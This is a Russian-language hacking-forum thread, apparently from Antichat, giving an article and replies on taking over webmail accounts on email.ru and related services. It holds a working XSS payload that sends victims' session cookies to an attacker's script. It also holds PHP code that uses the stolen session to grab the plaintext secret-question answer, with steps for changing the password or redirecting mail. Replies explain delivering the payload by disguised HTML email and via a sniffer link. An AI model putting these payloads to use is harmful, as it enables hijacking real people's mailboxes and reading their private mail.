Форум АНТИЧАТ - Захват ящика на email.ru(aport.ru,omen.ru,atrus.ru,au.ru,imail.ru, aport2000.ru)

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Статьи (https://forum.antichat.xyz/forumdisplay.php?f=30)

Захват ящика на email.ru(aport.ru,omen.ru,atrus.ru,au.ru,imail.ru, aport2000.ru)

Как выяснилось фильтров там вообще никаких нет, ну или покрайне мере я их там не нашёл :)))
Для идентификации пользователей сервер использует id(в переменной cookie) или если id не обноружен, то куки. Причём идентификатор сесии СОВПАДАЕТ с переменной "AGMail" в cookies.
Впринципе нам достаточно получить только куки пользователя и подделов их попасть в его ящик, но это сработате только если пользователь не нажал кнопку "выход"
=> напишем скрипт, который отсылает cookies на скрипт(причём данный скрипт работает не только в IE, но и в других броузерах поддерживающих javascript:

Код:

<script>img=new Image();img.src='http://adres_scripta.php?'+document.cookie;</script>

Поскольку ответ на секретный вопрос храниться в открытом виде, напишем ещё один скрипт на php, который сохраняет нам страницу "Информация о пользователе" где он и присутствует:

PHP код:


		
			
<?

$nachalo=strpos("$QUERY_STRING","AGMail=")+7; // ищем номер позиции с которой начинается cookie

$cooka=substr("$QUERY_STRING","$nachalo"); // сохраняем cookie в переменную $cooka

$p=join('',file("http://email.ru/scripts/options?user=1&site=rol&cookie={$cooka}")); // читаем информацию о пользователе и загоняем её в переменную $p

$f=Fopen("./{$cooka}.html","w") or die("ale!!!!!!!!!"); // открывает канал для записи

fputs($f,$p); // записываем переменную $p

fputs($f,$QUERY_STRING); // на странице "Информация о пользователе" нет адреса жертвы, но он есть в куках, потому также запишим их в этот фал на всякий случай :)

fclose($f); // закрываем канал

?>

Потом идём вместе с секретным вопросом и меняем пароль на мыло !
P.S. По этому же принцепу можно читать чужую почту, записав свой адрес на перенапрвыление почты...

1 чето не сработало!
а в 2 как применить?
Просто отправить по почте или на сайт загрузить?

Цитата:

Сообщение от rsha1988

1 чето не сработало!
а в 2 как применить?
Просто отправить по почте или на сайт загрузить?

Первый скрипт от правляешь по почте в виде html письма
Второй заливаешь на сайт(бесплатный хостинг не подойдёт так как там запрешены исходяшие линки)

1 я понял (я думал на mail.ru это работает )) )!
А вот 2 чето не понятно...
$p=join - это ник чтоли?
user=1 - и как я узнаю ид мыла...

Цитата:

Сообщение от rsha1988

&cookie={$cooka} - эт ид
$p=join - это функция которая читает страницу

Красавец! Но на mail.ru тэг <script> фильтруется и заменяется на <xscript>... так что думаем дальше...

вообще для mail.ru , просто посылаещь http://antichat.ru/cgi-bin/s.jpg? и ждещь когда зайдут по этой ссылке , и на снифе появиться сесия атакуемого , просто вставляешь идешь по его ссылке (что в снифере появилась ) и все ты у него на почте ":))
конечно это наверно все знают .....

а вот офигенный сайтик http://unknown-.chat.ru/page5.html прочтите ":))

да, и ссылку можно замаскировать , просто он открывает письмо и она само срабатывает

Грандиозно! Действительно работает! Изыскателю - Огромный респект!

Попробовал на своём почтовом ящике, и получил к нему доступ... вот ведь теперь бояться надо себя! :cool:

С уважением,
Илья.

Я считаю, что даная статья является заблуждением её автора.
Каждый сайт оставляет на "машинах" пользователей свои кукисы, тоесть: если мы на сайте вставляем строку alert(document.cookie) мы увидим кукисы те, которые мы сами туда записали, а отнюдь не кукисы с сайта почтовой системы. Данная статья будет актуальна и функциональна в случае, если эта строка, укзананная в статье: "<script>img=new Image();img.src='http://adres_scripta.php?'+document.cookie;</script>" записана в страницу почтовой системы. Если Вы вставили эту строку в свой сайт и надеетесь таким путём прочесть кукис, который сохранила одна из почтовых систем, то у Вас конечно же ничего не выйдет. Таким образом вы всего лишь прочтёте кукисы, которые сами впихнули юзверю. Надеюсь моя мысль понятна.